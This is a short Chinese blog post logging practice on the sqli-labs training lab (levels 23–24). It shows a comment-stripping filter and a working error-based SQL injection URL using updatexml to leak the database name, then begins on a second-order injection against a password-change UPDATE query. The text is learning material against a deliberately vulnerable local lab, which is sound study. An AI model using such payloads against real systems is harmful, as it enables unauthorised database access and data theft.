sqli-labs 实战记录(二)
发布时间
阅读量:
阅读量
Less-23
在这一区域里必须进行了防护措施,在线测试中我们可以通过同时观察源代码和学习如何规避WAF技术来提升技能。通过查看源代码时会发现注释部分已经被去除了。
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
实际上,在处理这条特定的SQL语句时,我们可以通过无需注释的方式直接使用单引号闭合来忽略后续的内容。
http://127.0.0.1/sqlilabs/Less-23/?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) or '1'='1
直接报出数据库,此题完结
Less-24
此题可能涉及二次注入的设计,在CTF类题目中通常要求获取admin账户后修改其密码,并利用该账户登录以获取flag。核心在于pass_change.php中的相关代码实现。
$sql = "UPDATE users SET PASSWORD='$pass' where username='$user
全部评论 (0)
还没有任何评论哟~
